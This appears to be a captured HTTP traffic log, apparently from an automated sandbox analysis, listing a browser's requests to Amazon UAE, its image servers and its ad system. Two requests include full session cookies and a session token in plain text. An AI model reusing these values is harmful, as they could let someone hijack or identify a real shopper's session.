    Source: global trafficHTTP traffic detected: GET /e/loi/imp?b=JAdwMenK-Lr6goco_zSS1gcAAAGRdjLkNgMAAAH2AQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICB-RDUN HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:959.984375,%22v%22:%7B%22p%22:100,%22t%22:1,%22def%22:%22groupm%22%7D,%22ptv%22:1724264922.217,%22ttv%22:1724264922.217%7D HTTP/1.1Host: aax-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; session-token=iEWMYEFKrtJIow/CNVuOz9FUzjcviv4X0ndqos/Z/EndZGMUPIqV/cGu0xyhHpymMzemV8FzzfcoPADcJtxlyqX92z9iptXKr7Ms1mulHo/qBujYJmsju/RRcnb/s2XPz1nDckf2AVkM7phlRS6PK0A8Oyz8zrBSfywK4K42pHS6LfHMBPPWnR7dE/8YgkCddjRb8f8+hproby/VGgI8K8LnWJVX3JXL79eqf88m0ziYgOsvjw8MkYnWie0RnY4FwNp1tJATQeWJi10aPKwLq+9IR2ER+0budc5NnOCUOKiuDhl6E9x/w1jDuk96dSs86r5dxrWNLvn3N15ReTLbBABXtREiOpP9
    Source: global trafficHTTP traffic detected: GET /e/loi/imp?b=JA6_dv6h66iD3gIHv_uvJpoAAAGRdjLkNwMAAAH2AQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICA1J2Nd HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610033_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_AllAudio_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71GWDQsQzaL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81mSTCJf8rL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71-6gmcJ+TL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81HkPn35qKL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71DNx9jePML._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610032_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610035_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-ezsdz_372x232_ae-en._SY116_CB643136719_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51YIzqZ2R5L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-0zvf9_372x232_ae-en._SY116_CB643136714_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/618LrXHTM3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81-cKwx9+lL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61r-8obHj2L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/sash/ZpbG74laklgnz-i.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314PAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Search_auto-bottom-advertising-0_portal-batch-fast-btf-loom_placement%22%2C%22pageType%22%3A%22Search%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3MvP19lbmNvZGluZz1VVEY4Jms9dG95cyZjcmlkPTMzRFk4Q1JUS0UwSlcmc3ByZWZpeD10b3klMkNhcHMlMkMyMDQmcmVmPW5iX3NiX25vc3NfMSZwZF9yZF93PXZkS0o3JmNvbnRlbnQtaWQ9YW16bjEuc3ltLjBlMmMzZWViLTBiODktNGY4ZC05NDcwLWJhNTI0MGY3MjkyNiZwZl9yZF9wPTBlMmMzZWViLTBiODktNGY4ZC05NDcwLWJhNTI0MGY3MjkyNiZwZl9yZF9yPUFQQVZDUUpNRks3OFFKRVYxUE1aJnBkX3JkX3dnPXZUaHltJnBkX3JkX3I9ZWI4Mzc5MzItNDhkMC00ZDM1LWI3NDMtYTZiZjYyZjVhODg2JnJlZl89cGRfaHBfZF9hdGZfdW5r%22%2C%22slotName%22%3A%22auto-bottom-advertising-0%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221027%22%2C%22adCreativeId%22%3A%220%22%2C%22adId%22%3A%22300164802756332%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-viewport-width: 1280sec-ch-device-memory: 8viewport-width: 1280sec-ch-ua-platform-version: "10.0.0"dpr: 1downlink: 10sec-ch-dpr: 1ect: 4gsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/s?k=toys&_encoding=UTF8&content-id=amzn1.sym.0e2c3eeb-0b89-4f8d-9470-ba5240f72926&crid=33DY8CRTKE0JW&pd_rd_r=eb837932-48d0-4d35-b743-a6bf62f5a886&pd_rd_w=vdKJ7&pd_rd_wg=vThym&pf_rd_p=0e2c3eeb-0b89-4f8d-9470-ba5240f72926&pf_rd_r=APAVCQJMFK78QJEV1PMZ&sprefix=toy%2Caps%2C204&ref=pd_hp_d_atf_unkAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=261-8635865-4706955; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=260-8031893-3804011; session-token=iEWMYEFKrtJIow/CNVuOz9FUzjcviv4X0ndqos/Z/EndZGMUPIqV/cGu0xyhHpymMzemV8FzzfcoPADcJtxlyqX92z9iptXKr7Ms1mulHo/qBujYJmsju/RRcnb/s2XPz1nDckf2AVkM7phlRS6PK0A8Oyz8zrBSfywK4K42pHS6LfHMBPPWnR7dE/8YgkCddjRb8f8+hproby/VGgI8K8LnWJVX3JXL79eqf88m0ziYgOsvjw8MkYnWie0RnY4FwNp1tJATQeWJi10aPKwLq+9IR2ER+0budc5NnOCUOKiuDhl6E9x/w1jDuk96dSs86r5dxrWNLvn3N15ReTLbBABXtREiOpP9; csm-hit=tb:s-RP6015S40NY7Z1AX6ZEM|1724264932059&t:1724264932060&adb:adblk_no
    Source: global trafficHTTP traffic detected: GET /e/loi/imp?b=JHmX5NPJ7V2JK051HMLo-qcAAAGRdjLk1wMAAAH2AQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICCwJel0 HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-vubbe_372x232_ae-en._SY116_CB643136714_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/loi/imp?b=JP9UG7VQZht7NRTb3weJQcEAAAGRdjLk2AMAAAH2AQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICAysaqX HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71YanNbDe3L._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51uDcEGE7-L.js?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71F6CWfC-yL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/81cggBqOhgL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/411x8BHUrFL._RC%7C71xP0umV4JL.js,01gK5H1EnXL.js,01phmzCOwJL.js,01eOvPdxG7L.js,71xgcL-oXCL.js,41jBieyCvYL.js,01wXnKULArL.js,01+pnQJuQ0L.js,21fcR05bSUL.js,41rnk3z1gYL.js,51H8vCDt+dL.js,31J-NEfNY0L.js,11lEMI5MhIL.js,31+UifI0MIL.js,71-pKfDl0GL.js,41aCLC6fiuL.js,01VYGE8lGhL.js_.js?AUIClients/NavDesktopUberAsset&4c3EyOfv HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71qrtZlAzuL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51m-fKwiHIL._AC_UL320_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314P HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /e/xsp/getAd?placementId=a6b228d9-6ecf-4580-a80f-06ec30d01262&src=518&rj=%7B%7D&slot=auto-bottom-advertising-0&rid=0101303bdabc4c01cc6316b4cb39fd37d0ef69e5c99e4e3dad870bf325de8a77398b HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://images-eu.ssl-images-amazon.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
